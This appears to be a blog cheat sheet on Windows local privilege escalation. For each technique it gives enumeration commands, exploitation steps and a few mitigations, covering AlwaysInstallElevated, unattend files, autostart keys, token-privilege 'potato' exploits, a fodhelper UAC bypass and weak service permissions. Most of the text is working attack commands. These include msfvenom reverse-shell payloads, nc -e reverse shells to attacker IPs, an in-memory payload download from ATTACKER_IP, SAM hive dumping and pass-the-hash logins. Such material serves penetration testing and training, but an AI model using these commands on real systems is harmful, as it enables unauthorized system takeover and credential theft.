Windows Local Privilege Escalation

Posted Oct 27, 2025

6 min read

🛠️ Under Constructions

Useful Tools

In the following table, some popular and useful tools for Windows local privilege escalation are presented:

Name	Language	Author	Description
SharpUp	C#	@harmj0y	SharpUp is a C# port of various PowerUp functionality
PowerUp	PowerShell	@harmj0y	PowerUp aims to be a clearinghouse of common Windows privilege escalation
Privesc	PowerShell	enjoiz	Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation
Winpeas	C#	@hacktricks_live	Windows local Privilege Escalation Awesome Script
PrivescCheck	PowerShell	@itm4n	Privilege Escalation Enumeration Script for Windows

AlwaysInstallElevated

Manual Enumeration

$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Tool Enumeration

$ SharpUp.exe audit AlwaysInstallElevated

Exploitation

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f msi > backdoor.msi

execute on windows
$ msiexec /quiet /qn /i backdoor.msi

Mitigation

To mitigate the AlwaysInstallElevated vulnerability, it is recommended to set the AlwaysInstallElevated value to 0 in both the HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER hives in the Windows Registry.

Answer files (Unattend files)

Manual Enumeration

$ Write-Host `n;foreach ($file in @('C:\Windows\Panther\unattend.xml', 'C:\Windows\Panther\Unattend\unattend.xml', 'C:\Windows\System32\Sysprep\unattend.xml', 'C:\Windows\System32\Sysprep\sysprep.xml', 'C:\Windows\System32\Sysprep\Panther\unattend.xml', 'C:\Windows\sysprep.inf', 'C:\Windows\unattend.xml', 'C:\unattend.xml', 'C:\sysprep.inf')) { if (Test-Path $file) { Write-Host "[+] $file" } }; Write-Host `n

Tool Enumeration

$ SharpUp.exe audit UnattendedInstallFiles

Exploitation

1-  Read the content of the found answer file:
$ type  C:\Windows\Panther\Unattend\Unattend.xml

2- decode the base64 password field
$ echo "<base64 string>" | base64 -d

Leaked Credentials (GitHub Repository)

$ git log

$ git diff <commit-id-1> <commit-id-2>

$ git show

Leaked Credentials (PowerShell History)

$ C:\Users\<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Mitigation

$ Clear-Content -Path "C:\Users\<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

Logon Autostart Execution (Registry Run Keys)

Manual Enumeration

$ reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Tool Enumeration

$ SharpUp.exe audit RegistryAutoruns

Exploitation

$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > shell.exe

Rename the malicious exe (shell.exe) to ‘NCV_AMD64.exe’.
Open a listener on your Kali machine.
Reboot the victim’s machine and login as Adminstrator:

Mitigation

$ reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "<KeyName>" /f

Logon Autostart Execution (Startup Folder)

$ icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Tool Enumeration

$ accesschk.exe /accepteula "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Exploitation

$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > shell.exe

Move the malicious executable file to ‘C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup’.
Open a listener on your Kali machine.
Reboot the victim’s machine and login as Adminstrator:

Mitigation

$ takeown /F "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /A /R /D Y
$ icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /reset /T /C /Q

SeBackupPrivilege

Enumeration

$ whoami /priv
$ SharpUp.exe audit TokenPrivileges

Exploitation

$ mkdir C:\temp
$ reg save hklm\sam C:\temp\sam.hive
$ reg save hklm\system C:\temp\system.hive
$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
$ evil-winrm -i <ip> -u "Administrator" -H "<hash>"

SeImpersonatePrivilege

Enumeration

$ whoami /priv
$ SharpUp.exe audit TokenPrivileges

Exploitation

PrintSpoofer

$ PrintSpoofer64.exe -i -c cmd

Potato Family JuicyPotato

JuicyPotatoNG

JuicyPotatoNG.exe -t * -p C:\windows\system32\cmd.exe -a "/c C:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.16.48 9002"

PrintSpoofer

# can use -i to inject to same process
PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

RoguePotato

c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999

# If outbound 135 is blocked, pivot the OXID resolver via socat on your redirector:
# On attacker redirector (must listen on TCP/135 and forward to victim:9999)
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999

# On victim, run RoguePotato with local resolver on 9999 and -r pointing to the redirector IP
RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999

SharpEfsPotato

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
# we cat the w.log  
type C:\temp\w.log
nt authority\system

EfsPotato

# output will be nt authority\system
EfsPotato.exe "whoami"

# If one pipe fails or EDR blocks it, try the other supported pipes:
EfsPotato <cmd> [pipe]
	pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)

GodPotato

# Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present.
GodPotato -cmd "cmd /c whoami"
# You can achieve a reverse shell like this.
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

DCOMPotato

# PrinterNotify variant
PrinterNotifyPotato.exe "cmd /c whoami"

# McpManagementService variant (Server 2022 also)
McpManagementPotato.exe "cmd /c whoami"

SigmaPotato

# Load and execute from memory (no disk touch)
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
[SigmaPotato]::Main("cmd /c whoami")

# Or ask it to spawn a PS reverse shell
[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))

CLSID Problems

# Oftentimes default CLSID that JuicyPotato uses doesn't work 
https://ohpe.it/juicy-potato/CLSID/

Checking CLSIDs

# Download Join-Object.ps1 and load it
https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1

# download and execute 
https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1

# trying every CLSID  when the port number changes, it will mean that the CLSID worked.
# Check the working CLSIDs using the parameter -c
https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat

Stored Credentials (Runas)

Enumeration

$ cmdkey /list

Exploitaion

- on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > mallicous.exe

- on victim:
$ runas /savecred /user:WORKGROUP\Administrator "C:\Windows\Tasks\mallicous.exe"

UAC Bypass

Enumeration

$ reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Tool Enumeration

$ SharpUp.exe audit

Exploitation

ℹ️ This case study leverages a UAC384 bypass that abuses the Fodhelper.exe application

on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > mallicous.exe

on victim:
$ New-Item -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force
$ New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
$ Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(default)" -Value "powershell -exec bypass -c C:\<full_path>\<binary.exe>" -Force
C:\Windows\System32\fodhelper.exe

Unquoted Service Path

Enumeration

$ wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
$ sc qc "Vulnerable Service 1"
$ icacls "C:\Program Files\Vulnerable Service1"

Tool Enumeration

$ SharpUp.exe audit UnquotedServicePath

Exploitation

$ sc query "Vulnerable Service 1"

on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service.exe

on victim:
$ iwr -Uri http://<ip>:<port>/Service.exe -Outfile "C:\Program Files\Vulnerable Service1\Service.exe"
$ sc stop "Vulnerable Service 1"
$ sc start "Vulnerable Service 1"

Weak Registry Permissions

Enumeration

Get-Acl -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" | fl
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"

Tool Enumeration

SharpUp.exe audit ModifiableServiceRegistryKeys

Exploitation

on attacker
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service4.exe
nc -lnvp 9001

on victim:
iwr -Uri http://<ip>:<port>/Service4.exe -Outfile C:\Windows\Tasks\Service4.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" /t REG_EXPAND_SZ /v ImagePath /d "C:\Windows\Tasks\Service4.exe" /f
sc start "Vulnerable Service 4"

Mitigation

Automated Script
# Define the registry key path
$regKey = "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"

# Get the current ACL (Access Control List) for the registry key
$acl = Get-Acl -Path $regKey

# Specify the account and access rights to be removed
$account = "BUILTIN\Users"
$accessRights = [System.Security.AccessControl.RegistryRights]::FullControl

# Create a new access rule to remove FullControl
$accessRule = New-Object System.Security.AccessControl.RegistryAccessRule($account, $accessRights, "Deny")

# Remove the access rule from the ACL
$acl.RemoveAccessRule($accessRule)

# Set the modified ACL back to the registry key
Set-Acl -Path $regKey -AclObject $acl

Weak Service Binary Permissions

Enumeration

icacls "C:\Program Files\CustomSrv2\Service2.exe"

sc qc "Vulnerable Service 2"

Tool Enumeration

$ SharpUp.exe audit ModifiableServiceBinaries

Exploitation

$ sc stop "Vulnerable Service 2"

on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service2.exe

on victim:
$ iwr -Uri http://<ip>:<port>/Service2.exe -Outfile C:\Program Files\CustomSrv2\Service2.exe
$ sc start "Vulnerable Service 2"

Mitigation

icacls "C:\Program Files\CustomSrv2\Service2.exe" /remove:g BUILTIN\Users:(M)

CheetSheets

Windows LPE

This post is licensed under CC BY 4.0 by the author.

Useful Tools

AlwaysInstallElevated

Manual Enumeration

Tool Enumeration

Exploitation

Mitigation

Answer files (Unattend files)

Manual Enumeration

Tool Enumeration

Exploitation

Leaked Credentials (GitHub Repository)

Leaked Credentials (PowerShell History)

Mitigation

Logon Autostart Execution (Registry Run Keys)

Manual Enumeration

Tool Enumeration

Exploitation

Mitigation

Logon Autostart Execution (Startup Folder)

Tool Enumeration

Exploitation

Mitigation

SeBackupPrivilege

Enumeration

Exploitation

SeImpersonatePrivilege

Enumeration

Exploitation

Potato Family JuicyPotato

JuicyPotatoNG

PrintSpoofer

RoguePotato

SharpEfsPotato

EfsPotato

GodPotato

DCOMPotato

SigmaPotato

CLSID Problems

Checking CLSIDs

Stored Credentials (Runas)

Enumeration

Exploitaion

UAC Bypass

Enumeration

Tool Enumeration

Exploitation

Unquoted Service Path

Enumeration

Tool Enumeration

Exploitation

Weak Registry Permissions

Enumeration

Tool Enumeration

Exploitation

Mitigation

Weak Service Binary Permissions

Enumeration

Tool Enumeration

Exploitation

Mitigation

Trending Tags